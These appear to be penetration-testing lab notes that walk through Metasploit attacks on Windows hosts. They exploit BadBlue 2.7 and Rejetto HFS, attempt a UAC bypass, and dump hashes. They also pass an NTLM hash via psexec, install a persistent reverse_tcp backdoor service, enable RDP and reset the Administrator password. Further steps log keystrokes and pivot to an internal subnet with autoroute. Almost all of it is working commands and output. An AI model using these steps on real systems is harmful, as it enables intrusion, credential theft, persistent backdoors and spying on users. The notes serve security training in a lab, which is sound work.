searchmigrateusepost/windows/manage/migrateinfo# Description:# This module will migrate a Meterpreter session from one process to # another. A given process PID to migrate to or the module can spawn # one and migrate to that newly spawned process.setSESSION1run# It will not migrate if it's already a x64 process
📌 Applications version is a very useful information. It can lead to a privilege escalation vulnerability!
loot
The /root/.msf4/loot/ folder can be handy.
Check Antivirus
searchtype:postplatform:windowsenum_avusepost/windows/gather/enum_av_excluded# Description:# This module will enumerate the file, directory, process and # extension-based exclusions from supported AV products, which # currently includes Microsoft Defender, Microsoft Security # Essentials/Antimalware, and Symantec Endpoint Protection.setSESSION1run
searchenum_patchesusepost/windows/gather/enum_patches# Description:# This module will attempt to enumerate which patches are applied to a # windows system based on the result of the WMI query: SELECT HotFixID # FROM Win32_QuickFixEngineering# A KB list can be specifiedsetSESSION1run# If this doesn't work, migrate to a "NT AUTHORITY\SYSTEM" user service
This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
getuidServerusername:VICTIM\admingetsystem# gesystem failsgetprivsEnabledProcessPrivileges==========================Name----SeChangeNotifyPrivilegeSeIncreaseWorkingSetPrivilegeSeShutdownPrivilegeSeTimeZonePrivilegeSeUndockPrivilege# "admin" user my be part of the Administrators group
shell
On the Windows target cmd
netusersadminAdministratorGuestnetlocalgroupadministratorsMembers-------------adminAdministrator# Yes, "admin" is part of the Administrators group# but doesn't have administrative privileges through the Meterpreter sessionexit
[*] Started reverse TCP handler on 10.10.24.6:5533 [+] Windows 2012 R2 (6.3Build9600). may be vulnerable.[*] UAC is Enabled, checking level...[+] Part of Administrators group!Continuing...[+] UAC is set to Default[+] BypassUAC can bypass this setting, continuing...[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System[*] Exploit completed, but no session was created.
getuidServerusername:NTAUTHORITY\LOCALSERVICEgetprivsEnabledProcessPrivileges==========================Name----SeAssignPrimaryTokenPrivilegeSeAuditPrivilegeSeChangeNotifyPrivilegeSeCreateGlobalPrivilegeSeImpersonatePrivilege# Token Impersonation can be performedSeIncreaseQuotaPrivilegeSeIncreaseWorkingSetPrivilegeSeSystemtimePrivilegeSeTimeZonePrivilegehashdump# try to check if the user have sufficient privileges
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Exploitation
search badblue 2.7
use exploit/windows/http/badblue_passthru
set TARGET BadBlue\ EE\ 2.7\ Universal
run
sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: ATTACKDEFENSE\Administrator
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Exploitation
use exploit/windows/http/badblue_passthru
set TARGET BadBlue\ EE\ 2.7\ Universal
run
sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: ATTACKDEFENSE\Administrator
Privilege Escalation
pgrep lsass
migrate 780
getuid
Server username: NT AUTHORITY\SYSTEM
Use PSExec to login with Administrator user and its password hashes
exit
search psexec
use exploit/windows/smb/psexec
options
set payload windows/x64/meterpreter/reverse_tcp
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d
exploit
getuid
Server username: NT AUTHORITY\SYSTEM
sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
80/tcp open http HttpFileServer httpd 2.3
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
Exploitation
search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
options
set payload windows/x64/meterpreter/reverse_tcp
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
Persistence
❗ In order to set up persistence, administrative privileges are required.
background
search platform:windows persistence
use exploit/windows/local/persistence_service
info
# Description:
# This Module will generate and upload an executable to a remote host,
# next will make it a persistent service. It will create a new service
# which will start the payload whenever the service is running. Admin
# or system privilege is required.
set payload windows/meterpreter/reverse_tcp
set SESSION 1
run
Successful maintained access. Once the persistent backdoor is installed, it's going to continue to run (across restarts) as a service and a multi handler listening to a connection will receive a connection from the service.
exit
# Kill all sessions
sessions -K
sessions
# No active sessions.
Regain access to the system
use multi/handler
options
# Set the options as specified for the PERSISTENCE_SERVICE Exploit
set payload windows/meterpreter/reverse_tcp
set LHOST eth1
set LPORT 4444
run
80/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
# RDP 3389 is disabled
Exploitation
use exploit/windows/http/badblue_passthru
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windows
getuid
Server username: NT AUTHORITY\SYSTEM
background
Enable RDP
search enable_rdp
use post/windows/manage/enable_rdp
options
sessions
set SESSION 1
run
# Verify port 3389 is open
db_nmap -p 3389 10.2.21.205
3389/tcp open ms-wbt-server
To access RDP, login credentials are necessary
sessions
sessions 1
shell
net users
Administrator Guest
Change the Administrator user's password (no recommended in a real-world system)
📌 During a standard Pentest, create another user account, add it to the Administrators group and utilize that one.
net user administrator p4ssword_12344321
exit
Legitimate credentials are now: administrator:p4ssword_12344321
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
shell
cd /
type flag.txt
Reveal Flag: 🚩
70a569da306697d64fc6c19afea37d94
Keylogging
pgrep explorer
migrate 2420
help
# Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Open a Notepad session on the Target machine.
On the Attacker machine, start the keystroke capture
keyscan_start
Starting the keystroke sniffer ...
Input some text into the target machine
Back on the attacker machine, capture the entered data
Pivoting technique with a network route to the internal network's subnet
ping 10.2.30.252
PING 10.2.30.252 (10.2.30.252) 56(84) bytes of data.
64 bytes from 10.2.30.252: icmp_seq=1 ttl=125 time=2.25 ms
64 bytes from 10.2.30.252: icmp_seq=2 ttl=125 time=1.99 ms
ping 10.2.21.166
PING 10.2.21.166 (10.2.21.166) 56(84) bytes of data.
# No response from target2
service postgresql start && msfconsole -q
db_status
workspace -a Pivoting
db_nmap -sV 10.2.30.252
Exploitation
search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
options
set RHOSTS 10.2.30.252
run
sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
getuid
Server username: WIN-OMCNBKR66MN\Administrator
ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 12
============
Name : AWS PV Network Device #0
Hardware MAC : 02:2a:6e:86:47:fc
MTU : 9001
IPv4 Address : 10.2.30.252 #
IPv4 Netmask : 255.255.240.0
IPv6 Address : fe80::9c0b:f00a:d8b4:f04f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 24
============
Name : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::5efe:a02:1efc
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Target2 is on the same Target1 subnet - 10.2.16.0/20 (look at the Interface 12)
10.2.16.0/20 = from 10.2.16.1 to 10.2.31.254
Pivoting
From the attacker's machine, a route through "target1 10.2.30.0/20 machine" is needed, to run MSF modules against target2 machine
run autoroute -s 10.2.30.0/20
Now, subnet 10.2.30.0/20 can be accessed with MSFconsole
background
sessions -n target-1 -i 1
Scan for open ports on the target2 system - 10.2.21.166
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.21.166
set PORTS 1-100
run
📌 The route is only applicable to MSFconsole, not outside of it
Port Forwarding
To perform an nmap scan on target2, a port forwarding need to be set up.
e.g. forward the remote port 80 to an attacker machine local port, which will allow to perform a service version enumeration of the target2 service
